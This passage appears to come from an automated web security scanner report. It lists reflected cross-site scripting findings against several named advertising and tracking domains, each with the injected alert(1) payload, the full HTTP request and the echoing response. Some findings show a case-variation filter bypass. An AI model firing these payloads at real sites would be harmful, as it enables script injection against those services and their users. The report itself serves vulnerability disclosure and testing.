PRpc=|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:33:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://mlb.mlb.com/mlb/ads/pointroll/PointRollAds.htm?pid=1361629J39720110725194750&redir=http://ad.doubleclick.net/click%3Bh=v8/3b94/3/0/*/l%3B244123027%3B0-0%3B0%3B5688483%3B2321-160/600%3B43295047/43312834/1%3B%3B~okv=%3Bpageid=stats%3Bsz=160x600%3Bpos=1%3Bvkey=undefined%3Bcontentid=undefined%3B%3Btile=2%3B~aopt=2/0/8e8d/0%3B~sscs=%3F$CTURL$&time=0|18:33|-5495cf';alert(1)//72dae9d4c18&flash=10&server=portalserve&bu=1724603');

2.27. http://amch.questionmarket.com/adscgen/popup.php [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/popup.php

Issue detail

The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eceb9"%3balert(1)//8e5bf6d142d was submitted in the type parameter. This input was echoed as eceb9";alert(1)//8e5bf6d142d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/popup.php?sub=amch&type=popupeceb9"%3balert(1)//8e5bf6d142d&survey_num=873769&site=14&code=43749713&p=1&protocol=http&pic=gif&creativename=opinion2-350x300-1l-eng-nul&secs_up=60&up_under=1&delay=0&top=100&left=100&load_unload=3&lang=&auto_ctl_invite=0&dc_creative=&dc_url=&dc_sizes=&dc_redisplay=0&dc_cover_after_survey=0&dc_return_delay=0&mx=0&my=0 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:04:56 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1317596696; expires=Fri, 07 Oct 2011 03:04:56 GMT; path=/; domain=.questionmarket.com
Content-Length: 1212
Content-Type: text/html


var DL_already_ran;

function DL_domain_popup() {
   if (DL_already_ran) return;

   var DL_x = 0 || window.screenLeft || window.screenX || 15000;
   var DL_y = 0 || window.screenTop || window.screenY ||
...[SNIP]...
_left=100,DL_top=100,DL_f=1,DL_invite=\\'http://amch.questionmarket.com/adscgen/invite.php?survey_num=873769&site=14&code=43749713&pic=gif&creativename=opinion2-350x300-1l-eng-nul&secs_up=60&type=popupeceb9";alert(1)//8e5bf6d142d\\';</script>
...[SNIP]...

2.28. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 21b7c<script>alert(1)</script>2b8e828c0be was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=321b7c<script>alert(1)</script>2b8e828c0be&c2=7117341&c3=5799258&c4=43658050&c5=70242458&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m2.feiwei.tv/g/lib/template/sandbox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 22:59:39 GMT
Date: Sun, 02 Oct 2011 22:59:39 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"321b7c<script>alert(1)</script>2b8e828c0be", c2:"7117341", c3:"5799258", c4:"43658050", c5:"70242458", c6:"", c10:"", c15:"", c16:"", r:""});



2.29. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bf7b0<script>alert(1)</script>b73cb9f2da3 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341bf7b0<script>alert(1)</script>b73cb9f2da3&c3=5799258&c4=43658050&c5=70242458&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m2.feiwei.tv/g/lib/template/sandbox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 22:59:40 GMT
Date: Sun, 02 Oct 2011 22:59:40 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341bf7b0<script>alert(1)</script>b73cb9f2da3", c3:"5799258", c4:"43658050", c5:"70242458", c6:"", c10:"", c15:"", c16:"", r:""});



2.30. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f8dca<script>alert(1)</script>638a85fbe05 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5799258f8dca<script>alert(1)</script>638a85fbe05&c4=43658050&c5=70242458&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m2.feiwei.tv/g/lib/template/sandbox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 22:59:40 GMT
Date: Sun, 02 Oct 2011 22:59:40 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5799258f8dca<script>alert(1)</script>638a85fbe05", c4:"43658050", c5:"70242458", c6:"", c10:"", c15:"", c16:"", r:""});



2.31. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 7b374<script>alert(1)</script>a269ac575a9 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5799258&c4=436580507b374<script>alert(1)</script>a269ac575a9&c5=70242458&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m2.feiwei.tv/g/lib/template/sandbox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 22:59:41 GMT
Date: Sun, 02 Oct 2011 22:59:41 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5799258", c4:"436580507b374<script>alert(1)</script>a269ac575a9", c5:"70242458", c6:"", c10:"", c15:"", c16:"", r:""});



2.32. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload b7d3d<script>alert(1)</script>c39da1e82c was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5799258&c4=43658050&c5=70242458b7d3d<script>alert(1)</script>c39da1e82c&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m2.feiwei.tv/g/lib/template/sandbox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 22:59:41 GMT
Date: Sun, 02 Oct 2011 22:59:41 GMT
Content-Length: 1256
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5799258", c4:"43658050", c5:"70242458b7d3d<script>alert(1)</script>c39da1e82c", c6:"", c10:"", c15:"", c16:"", r:""});



2.33. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ef225<script>alert(1)</script>616bae54eeb was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5799258&c4=43658050&c5=70242458&c6=ef225<script>alert(1)</script>616bae54eeb HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m2.feiwei.tv/g/lib/template/sandbox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 16 Oct 2011 22:59:42 GMT
Date: Sun, 02 Oct 2011 22:59:42 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5799258", c4:"43658050", c5:"70242458", c6:"ef225<script>alert(1)</script>616bae54eeb", c10:"", c15:"", c16:"", r:""});



2.34. http://cdn.krxd.net/config/ [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.krxd.net
Path:   /config/

Issue detail

The value of the site request parameter is copied into the HTML document as plain text between tags. The payload 43357<script>alert(1)</script>fb7066d837f was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /config/?pubid=d719e39d-e4be-4896-8d71-71012d0c51a0&site=nbc.com43357<script>alert(1)</script>fb7066d837f&callback=KRUX.configOnload HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbc.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.32.46.226.1315320921124944; ServedBy=logger-b002

Response

HTTP/1.1 404 Not Found
Content-Type: text/javascript
P3P: policyref="http://cdn.krxd.net/kruxcontent/p3p.xml", CP="NON DSP COR NID OUR DEL SAM OTR UNR COM NAV INT DEM CNT STA PRE LOC OTC"
Server: TornadoServer/1.2
X-Config-Cache: Miss
X-Request-Time: D=6418 t=1317596563377195
X-Served-By: logger-b010.krxd.net
Content-Length: 90
Date: Sun, 02 Oct 2011 23:02:43 GMT
Connection: close

{"error": "Non existant site for NBCU - nbc.com43357<script>alert(1)</script>fb7066d837f"}

2.35. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 325e7<script>alert(1)</script>a9904873cf7 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster325e7<script>alert(1)</script>a9904873cf7&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:15:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5865
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-061fbe1c-ab31-4091-896f-d3c631b60bd7-itl",iconSpanId:"te-clr1-061fbe1c-ab31-4091-896f-d3c631b60bd7-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"cachebuster325e7<script>alert(1)</script>a9904873cf7",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_061fbe1c_ab31_4091_896f_d3c631b60bd7_ib,interstitialWidth:160,interstitialHei
...[SNIP]...

2.36. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload be217<ScRiPt>alert(1)</ScRiPt>82ac448e49a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=hp01&aid=hp02&cid=72186705be217<ScRiPt>alert(1)</ScRiPt>82ac448e49a&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:15:05 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5947
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=76&pid=hp01&aid=hp02&cid=72186705be217<ScRiPt>alert(1)</ScRiPt>82ac448e49a&w=160&h=600" style="text-decoration:none" target="_blank">
...[SNIP]...

2.37. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 4036d<ScRiPt>alert(1)</ScRiPt>bbebc658ed7 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl4036d<ScRiPt>alert(1)</ScRiPt>bbebc658ed7&js=10 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:15:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5865
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
clr1_f94c6355_309e_430a_97ab_d07a39f058b1_bi={baseName:"te-clr1-f94c6355-309e-430a-97ab-d07a39f058b1",anchName:"te-clr1-f94c6355-309e-430a-97ab-d07a39f058b1-anch",width:160,height:600,ox:0,oy:0,plc:"tl4036d<ScRiPt>alert(1)</ScRiPt>bbebc658ed7",iplc:"rel",intDivName:"te-clr1-f94c6355-309e-430a-97ab-d07a39f058b1-itl",iconSpanId:"te-clr1-f94c6355-309e-430a-97ab-d07a39f058b1-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerI
...[SNIP]...

2.38. http://fim.adnxs.com/fpt [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fim.adnxs.com
Path:   /fpt

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 82338<script>alert(1)</script>8a2042977e9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fpt?id=3391&size=300x250&flash=1&cookies=1&callback=C1Os7Gk0Jd6Y.b1Ny7Ws0Sk6A82338<script>alert(1)</script>8a2042977e9&referrer=www.foxaudiencenetwork.com&age=&gender=&cb=1317598679840 HTTP/1.1
Host: fim.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=87200027&pos=mrec&rnd=596331511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-13214; path=/; expires=Sat, 31-Dec-2011 23:39:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Mon, 03-Oct-2011 23:39:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIm4sBEAoYOiA6KDowwuyj9AQQwuyj9AQYOQ..; path=/; expires=Sat, 31-Dec-2011 23:39:46 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]cvjr/?0P(*AuB-u**g1:XIFC`Ei'/29uJ21AT^e'P.TnGR%_uSD)S<r=JQU8M_.r2!JW.)(NR*'/*y:SC[D$jJx`HH.QXF5Y3d:i[bY<LGHdc+; path=/; expires=Sat, 31-Dec-2011 23:39:46 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 02 Oct 2011 23:39:46 GMT
Content-Length: 97
Content-Type: text/html; charset=ISO-8859-1

C1Os7Gk0Jd6Y.b1Ny7Ws0Sk6A82338<script>alert(1)</script>8a2042977e9={"result":{"cpm":0.0,"ad":""}}

2.39. http://fw.adsafeprotected.com/rjss/choices.truste.com/10736/9003/ca [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/choices.truste.com/10736/9003/ca

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21a5b"-alert(1)-"cf6c3bde548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/choices.truste.com21a5b"-alert(1)-"cf6c3bde548/10736/9003/ca?pid=hp01&aid=hp02&cid=72186705&c=cachebuster&w=160&h=600&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ad.doubleclick.net/adi/mlb.mlb/stats;pageid=stats;sz=160x600;pos=1;vkey=undefined;contentid=undefined;;tile=2;ord=6720409237314016
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
